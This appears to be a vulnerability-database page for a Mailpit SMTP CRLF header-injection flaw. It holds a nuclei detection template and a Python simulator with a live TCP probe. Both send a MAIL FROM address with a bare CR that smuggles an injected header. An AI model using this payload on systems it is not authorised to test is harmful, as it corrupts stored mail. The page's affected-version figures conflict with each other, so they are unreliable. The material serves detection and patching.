
Mailpit < 1.28.2 - SMTP CRLF Injection

CVE-2026-23829
Verified

Description

Mailpit < 1.28 contains a header injection caused by insufficient regex validation of `RCPT TO` and `MAIL FROM` addresses in the SMTP server. Because the address regex does not reject CR and LF characters, an attacker who supplies a crafted envelope address can inject arbitrary header lines into the message Mailpit stores. Exploitation requires nothing more than sending a crafted email address over SMTP.

Severity

Medium

CVSS Score

5.3

Exploit Probability

2%

Affected Product

mailpit

Published Date

January 21, 2026

Template Author

omarkurt

CVE-2026-23829.yaml
id: CVE-2026-23829

info:
  name: Mailpit < 1.28.2 - SMTP CRLF Injection
  author: omarkurt
  severity: medium
  description: |
    Mailpit < 1.28 contains a header injection caused by insufficient regex validation of `RCPT TO` and `MAIL FROM` addresses in the SMTP server. Because the address regex does not reject CR and LF characters, an attacker who supplies a crafted envelope address can inject arbitrary header lines into the message Mailpit stores. Exploitation requires nothing more than sending a crafted email address over SMTP.
  impact: |
    An attacker can inject arbitrary headers into captured emails, corrupt existing headers such as the Received header, and produce malformed .eml files. RFC 5321 forbids control characters in envelope addresses, so accepting them is a protocol violation as well as an injection vector.
  remediation: |
    Upgrade Mailpit to version 1.28.3 or later which updates the regex to explicitly exclude all ASCII control characters (\x00-\x1f) from email addresses.
  reference:
    - https://rosecurify.com/advisories/RO-26-002-mailpit-smtp-header-injection/
    - https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-23829
    epss-score: 0.01594
    epss-percentile: 0.81906
    cwe-id: CWE-93
    cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: axllent
    product: mailpit
    shodan-query: title:"Mailpit"
    fofa-query: title="Mailpit"
  tags: cve,cve2026,tcp,crlf,smtp,mailpit


tcp:
  - inputs:
      - data: "EHLO {{Hostname}}\r\n"
      - data: "MAIL FROM:<attacker\rX-Pwned:{{randstr}}>\r\n"
      - data: "RCPT TO:<victim@example.com>\r\n"
      - data: "DATA\r\n"
      - data: "Subject: Test \r\n\r\nCombined Template Check.\r\n.\r\n"
      - data: "QUIT\r\n"

    host:
      - "{{Hostname}}"
    port: 1025
    read-size: 2048

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "250"

      - type: word
        words:
          - "501"
          - "500"
          - "553"
        negative: true
# digest: 4a0a00473045022066181291afd21416f8f781a061eef7905160183f78bd837ba248f8b816af503a022100ded12c2f8e7a847902acc1b8a43b955ffb12a95887b11e80ac65297484b11a91:922c64590222798bb761d5b6d8e72950
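The exchange the template performs and the fix it tests for, as an added Python example that is not part of this page or of Mailpit's code. It builds a constructed in-memory stand-in for Mailpit's SMTP side (pre-fix mode accepts any address; hardened mode applies the control-character exclusion from the remediation), feeds the template's six inputs through it, applies the template's matcher logic to the replies, and shows the header line split that a bare CR produces in the stored message. The EHLO host name `probe.local`, the marker value, the `Received:` header layout and the `probe_live` helper are assumptions for illustration.

```python
import re
import socket

# RFC 5321 forbids ASCII control characters in an envelope address; the fix on
# this page excludes exactly this range (\x00-\x1f) from Mailpit's address regex.
CONTROL_CHARS = re.compile(r"[\x00-\x1f]")

def address_is_clean(addr: str) -> bool:
    """True when the envelope address contains no ASCII control character."""
    return CONTROL_CHARS.search(addr) is None

def template_commands(marker: str) -> list[str]:
    """The template's six inputs. The MAIL FROM address carries a bare CR: SMTP
    ends a command only at CRLF, so the CR reaches the address validator intact.
    (EHLO host name and marker value are assumptions, not template values.)"""
    return [
        "EHLO probe.local\r\n",
        f"MAIL FROM:<attacker\rX-Pwned:{marker}>\r\n",
        "RCPT TO:<victim@example.com>\r\n",
        "DATA\r\n",
        "Subject: Test \r\n\r\nCombined Template Check.\r\n.\r\n",
        "QUIT\r\n",
    ]

def template_verdict(replies: list[str]) -> bool:
    """The template's matchers: some reply contains 250 AND none contains 501,
    500 or 553 (matchers-condition: and, second matcher negative)."""
    blob = "".join(replies)
    return "250" in blob and not any(c in blob for c in ("501", "500", "553"))

class FakeMailpit:
    """Constructed stand-in for Mailpit's SMTP side (not Mailpit's own code).
    hardened=False accepts any address, the pre-fix behaviour; hardened=True
    rejects control characters with 501, as the patched regex would."""

    def __init__(self, hardened: bool):
        self.hardened = hardened
        self.sender = None
        self.in_data = False
        self.captured = []  # trace header prepended to each stored message

    def reply(self, line: str) -> str:
        if self.in_data:
            if line != ".\r\n":
                return ""  # body lines get no reply
            self.in_data = False
            # The envelope sender is copied into a trace header of the stored
            # message (layout assumed); an unvalidated CR splits that header.
            self.captured.append(f"Received: from probe.local (envelope-from "
                                 f"{self.sender}) by fake.local\r\n")
            return "250 2.0.0 Ok: queued\r\n"
        verb = line.upper()
        if verb.startswith("EHLO"):
            return "250-fake.local\r\n250 8BITMIME\r\n"
        if verb.startswith("MAIL FROM:"):
            addr = line.split(":", 1)[1].strip()  # drops the CRLF, keeps inner CR
            if self.hardened and not address_is_clean(addr):
                return "501 5.1.7 Bad sender address syntax\r\n"
            self.sender = addr
            return "250 2.1.0 Ok\r\n"
        if verb.startswith(("RCPT TO:", "DATA")) and not self.sender:
            return "503 5.5.1 Need MAIL first\r\n"
        if verb.startswith("RCPT TO:"):
            return "250 2.1.5 Ok\r\n"
        if verb.startswith("DATA"):
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>\r\n"
        if verb.startswith("QUIT"):
            return "221 2.0.0 Bye\r\n"
        return "500 5.5.2 Command not recognized\r\n"

def run_session(server: FakeMailpit, commands: list[str]) -> list[str]:
    """Feed the inputs to the in-memory server line by line, splitting on CRLF
    only, as a real SMTP reader does (a bare CR is not a line terminator)."""
    replies = ["220 fake.local ESMTP\r\n"]
    for chunk in commands:
        for part in chunk.split("\r\n")[:-1]:
            r = server.reply(part + "\r\n")
            if r:
                replies.append(r)
    return replies

def stored_header_lines(server: FakeMailpit) -> list[str]:
    """Header lines of the stored message as a parser that honours a lone CR
    sees them: the text after the CR becomes its own, attacker-chosen line."""
    return [ln for msg in server.captured for ln in msg.splitlines()]

def probe_live(host: str, port: int = 1025, marker: str = "probe") -> bool:
    """Same exchange over TCP against a real listener, read with the template's
    2048-byte reads (no reply framing, exactly like the nuclei tcp protocol)."""
    with socket.create_connection((host, port), timeout=5) as s:
        replies = [s.recv(2048).decode("latin-1")]
        for cmd in template_commands(marker):
            s.sendall(cmd.encode("latin-1"))
            replies.append(s.recv(2048).decode("latin-1"))
    return template_verdict(replies)
```

Run `run_session(FakeMailpit(False), template_commands("abc"))` and the verdict is True with an `X-Pwned:abc` line in `stored_header_lines`; with `FakeMailpit(True)` the MAIL FROM gets a 501 and the verdict is False. Two things worth noticing: the positive "250" matcher is already satisfied by the EHLO reply, so the template's verdict rests entirely on the absence of a 5xx rejection, and a server that silently strips the CR rather than rejecting it would still be flagged, so a real finding should be confirmed by opening the captured message in Mailpit and looking for the injected line. Also, `run_session` deliberately splits on CRLF only; splitting with `str.splitlines()` would cut the payload at the bare CR and hide the very bug being tested.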
Score

5.3

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE ID:
CVE-2026-23829
CWE ID:
CWE-93

References

https://rosecurify.com/advisories/RO-26-002-mailpit-smtp-header-injection/
https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c

Remediation Steps

Upgrade Mailpit to version 1.28.3 or later which updates the regex to explicitly exclude all ASCII control characters (\x00-\x1f) from email addresses.